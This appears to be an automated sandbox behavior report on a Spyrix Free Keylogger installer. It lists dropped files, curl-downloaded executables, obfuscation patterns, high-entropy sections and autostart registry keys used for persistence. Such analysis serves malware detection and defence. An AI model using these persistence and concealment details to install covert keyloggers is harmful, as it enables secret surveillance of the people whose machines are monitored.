Source: Spyrix Free Keylogger.lnk.19.dr	LNK file: ..\..\..\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
Source: Uninstall Spyrix Free Keylogger.lnk.19.dr	LNK file: ..\..\..\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe
Source: Spyrix Free Keylogger.lnk0.19.dr	LNK file: ..\..\..\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp

File written: C:\ProgramData\Spyrix Free Keylogger\temp\logger.ini

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp

Window found: window name: TSelectLanguageForm

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Automated click: I accept the agreement
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Automated click: I accept the agreement
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Automated click: Install
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Automated click: I accept the agreement
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Automated click: I accept the agreement
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Automated click: Next >
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Automated click: Next >
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Automated click: Next >

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp

File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Binary contains a suspicious time stamp

Source: [space]= .exe.5.dr

Static PE information: 0xFC3E2D57 [Fri Feb 8 17:01:11 2104 UTC]

PE file contains sections with non-standard names

Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name:
Source: is-JF90R.tmp.19.dr	Static PE information: section name: .d
Source: is-JF90R.tmp.19.dr	Static PE information: section name: .adata
Source: is-V94IU.tmp.19.dr	Static PE information: section name: .rodata
Source: is-V94IU.tmp.19.dr	Static PE information: section name: .rotext
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name:
Source: is-9ATRT.tmp.19.dr	Static PE information: section name: .adata
Source: is-3JAMQ.tmp.19.dr	Static PE information: section name: .didata
Source: is-IFJUI.tmp.19.dr	Static PE information: section name: /4
Source: is-IFJUI.tmp.19.dr	Static PE information: section name: /19
Source: is-IFJUI.tmp.19.dr	Static PE information: section name: /31
Source: is-IFJUI.tmp.19.dr	Static PE information: section name: /45
Source: is-IFJUI.tmp.19.dr	Static PE information: section name: /57
Source: is-IFJUI.tmp.19.dr	Static PE information: section name: /70
Source: is-IFJUI.tmp.19.dr	Static PE information: section name: /81
Source: is-IFJUI.tmp.19.dr	Static PE information: section name: /92
Source: ffws.exe.53.dr	Static PE information: section name: .rodata
Source: ffws.exe.53.dr	Static PE information: section name: .rotext

Uses code obfuscation techniques (call, push, ret)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_008650DC push 00865161h; ret	53_2_00865159
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_00865B30 push 00865BB6h; ret	53_2_00865BAE
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_0086DEA3 push cs; ret	53_2_0086DEB4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_008660D4 push 0086613Ch; ret	53_2_00866134
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_0086D2D4 push cs; iretd	53_2_0086D3AA
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_00872002 push 00000075h; retf	53_2_00872004
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_00874401 push ecx; ret	53_2_00874402
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_00869C0D push eax; ret	53_2_00869C8D
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_0086524C push 008652D7h; ret	53_2_008652CF
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_0086D586 push ebx; ret	53_2_0086D587
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_00865188 push 00865230h; ret	53_2_00865228
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_008675AC push 008675D9h; ret	53_2_008675D1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_0086D3D6 push cs; iretd	53_2_0086D3AA
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_00865DFC push 00865E74h; ret	53_2_00865E6C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_00867550 push 0086759Ah; ret	53_2_00867592
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_007B16A4 push 007B17DEh; ret	53_2_007B17D6
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_034003E4 push 03400410h; ret	53_2_03400408
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033FD398 push 033FD3C4h; ret	53_2_033FD3BC
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033F73F8 push 033F7424h; ret	53_2_033F741C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033E5238 push 033E5264h; ret	53_2_033E525C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033F5224 push 033F5266h; ret	53_2_033F525E
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033E5200 push 033E522Ch; ret	53_2_033E5224
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033F52A8 push 033F52D4h; ret	53_2_033F52CC
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033F52E0 push 033F530Ch; ret	53_2_033F5304
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033F011C push 033F0154h; ret	53_2_033F014C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033EE108 push 033EE134h; ret	53_2_033EE12C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033E5144 push 033E517Ch; ret	53_2_033E5174
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033ED1A8 push 033ED1F4h; ret	53_2_033ED1EC
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033E5190 push 033E51BCh; ret	53_2_033E51B4
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033E51C8 push 033E51F4h; ret	53_2_033E51EC
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033F4038 push 033F4070h; ret	53_2_033F4068

Source: [space]= .exe.5.dr	Static PE information: section name: .text entropy: 7.81759162350406
Source: is-JF90R.tmp.19.dr	Static PE information: section name: entropy: 7.970560832581065
Source: is-JF90R.tmp.19.dr	Static PE information: section name: entropy: 7.995359849273399
Source: is-JF90R.tmp.19.dr	Static PE information: section name: entropy: 7.98989686324796
Source: is-JF90R.tmp.19.dr	Static PE information: section name: entropy: 7.581553890924904
Source: is-JF90R.tmp.19.dr	Static PE information: section name: entropy: 7.998441689187187
Source: is-JF90R.tmp.19.dr	Static PE information: section name: .d entropy: 7.923610064617086
Source: is-9ATRT.tmp.19.dr	Static PE information: section name: entropy: 7.972249623981622
Source: is-9ATRT.tmp.19.dr	Static PE information: section name: entropy: 7.99458999281375
Source: is-9ATRT.tmp.19.dr	Static PE information: section name: entropy: 7.992015849394924
Source: is-9ATRT.tmp.19.dr	Static PE information: section name: entropy: 7.515192733866904
Source: is-9ATRT.tmp.19.dr	Static PE information: section name: entropy: 7.998936896615619
Source: is-9ATRT.tmp.19.dr	Static PE information: section name: .rsrc entropy: 7.953583660494071
Source: is-9ATRT.tmp.19.dr	Static PE information: section name: .data entropy: 7.561972396742998

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-IFJUI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-ASDJS.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-V94IU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sqlite3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-P60MT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-269PL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-3JAMQ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\webbrowser.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe	File created: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-632MH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JF90R.tmp	Jump to dropped file
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File created: C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\curl.exe	File created: C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-EI053.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-OO1B8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-ILFVG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-9ATRT.tmp	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-IFJUI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-ASDJS.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-V94IU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sqlite3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-P60MT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-269PL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-3JAMQ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-632MH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JF90R.tmp	Jump to dropped file
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File created: C:\ProgramData\Security Monitor\{WCS1080F-FD66-4650-B1B8-C8310A1CE2D3}\ffws.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-EI053.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ff.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-OO1B8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-ILFVG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	File created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-9ATRT.tmp	Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localSPM
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localSPM
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localSPM
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localSPM
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localmon
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localmon
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localmon
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run localmon

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run kbdsprt
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run kbdsprt
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run localSPM
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run localSPM

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
